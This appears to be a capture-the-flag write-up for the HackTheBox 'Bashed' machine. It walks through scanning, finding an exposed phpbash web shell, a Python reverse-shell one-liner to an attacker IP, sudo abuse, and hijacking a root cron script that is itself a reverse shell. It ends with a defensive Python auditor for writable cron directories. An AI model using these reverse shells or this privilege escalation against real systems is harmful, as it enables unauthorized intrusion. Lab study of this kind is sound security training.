Bashed
Port Checking
naabu -host bashed.htb -v
[INF] Running CONNECT scan with non root privileges
[DBG] Using host 10.10.10.68 for enumeration
[INF] Found 1 ports on host bashed.htb (10.10.10.68)
bashed.htb:80
Open ports:
port 80 web
Visiting the webpage presents us with the phpbash software. After some googling and poking around, it turns out phpbash is a web shell, so the dev might have left it somewhere on the website, which would give us RCE.
Directory Fuzzing
dirb http://bashed.htb
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Aug 24 05:37:07 2023
URL_BASE: http://bashed.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://bashed.htb/ ----
==> DIRECTORY: http://bashed.htb/css/
==> DIRECTORY: http://bashed.htb/dev/
==> DIRECTORY: http://bashed.htb/fonts/
==> DIRECTORY: http://bashed.htb/images/
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://bashed.htb/js/
==> DIRECTORY: http://bashed.htb/php/
+ http://bashed.htb/server-status (CODE:403|SIZE:298)
==> DIRECTORY: http://bashed.htb/uploads/
/dev seems suspicious; visiting it shows us two PHP files:
phpbash.php
phpbash.min.php
Foothold
Multiple reverse shell attempts have been made, but this one works:
export RHOST="YOUR_IP";export RPORT=4567;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Get Stable Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
press CTRL + Z (sends the shell to the background)
stty raw -echo;fg (fixes the terminal and returns to the session)
press ENTER to get the shell back
Checks
id
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
Priv Esc
Cool, user scriptmanager can run anything:
sudo -u scriptmanager /bin/bash
config.php
cat config.php
<?php
//SITE GLOBAL CONFIGURATION
$email = "yourmail@here.com"; //<-- Your email
?>
No creds found, sadly.
/scripts was found in the root directory (/):
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Aug 23 08:29 scripts
Contents of the folder
-rw-r--r-- 1 scriptmanager scriptmanager 218 Aug 23 08:29 test.py
-rw-r--r-- 1 root root 12 Aug 23 08:29 test.txt
At first glance it looks like the file is run automatically and its output is written to test.txt?
Content of test.py
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
The file content is literally a reverse shell. Change the IP to ours and open a listener:
nano test.py
s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0);
Wait a while and voilà:
nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.10.68] 38206
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
crontab
crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done
The crontab confirms that there is a root cron job that runs every .py file in /scripts.
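From a defender's angle, the misconfiguration here is a root cron job executing every file matching a glob in a directory that a non-root user can write to. The following added example (not part of the original writeup) audits a crontab line against the ownership and permissions of the directory it cd's into; the DirInfo lookup table is a hypothetical stand-in for os.stat, and the sample lines are constructed from the writeup's own crontab and ls output.

```python
import re
from collections import namedtuple
# Constructed sample input, copied from the writeup's crontab and ls output.
CRON_LINE = '* * * * * cd /scripts; for f in *.py; do python "$f"; done'
LS_LINE = "drwxrwxr-- 2 scriptmanager scriptmanager 4096 Aug 23 08:29 scripts"
DirInfo = namedtuple("DirInfo", "owner group perms")

def parse_ls_line(line):
    """Turn one `ls -ld` row into owner, group and the 9-char permission string."""
    fields = line.split()
    return DirInfo(owner=fields[2], group=fields[3], perms=fields[0][1:10])

def cron_command(line):
    """Drop the five schedule fields of a crontab entry; return the command."""
    parts = line.split(None, 5)
    return parts[5] if len(parts) == 6 else ""

def cd_targets(command):
    """Directories the command changes into (at the start or after ; & |)."""
    return re.findall(r"(?:^|[;&|])\s*cd\s+([^\s;&|]+)", command)

def runs_globbed_files(command):
    """True when the command loops over a glob and executes whatever matches."""
    return re.search(r"for\s+\w+\s+in\s+[^;]*\*", command) is not None

def audit(cron_line, dir_lookup):
    """Map each cd target of a root cron job to a list of findings ([] = clean).
    dir_lookup is a hypothetical path -> DirInfo table standing in for os.stat
    so the example runs offline."""
    cmd = cron_command(cron_line)
    findings = {}
    for path in cd_targets(cmd):
        info = dir_lookup.get(path)
        if info is None:
            findings[path] = ["directory not found"]
            continue
        issues = []
        if info.owner != "root":
            issues.append(f"owned by {info.owner}, not root")
        if info.perms[4] == "w" and info.group != "root":
            issues.append(f"group {info.group} can write")
        if info.perms[7] == "w":
            issues.append("world-writable")
        if issues and runs_globbed_files(cmd):
            issues.append("cron executes every matching file here as root")
        findings[path] = issues
    return findings

# On the writeup's entries: /scripts is scriptmanager-owned, group-writable, run by root.
REPORT = audit(CRON_LINE, {"/scripts": parse_ls_line(LS_LINE)})
```

A root-owned, mode 755 directory produces an empty findings list, which is the state a fix (chown root:root /scripts; chmod 755 /scripts, or pointing the job at a fixed script instead of a glob) should leave behind.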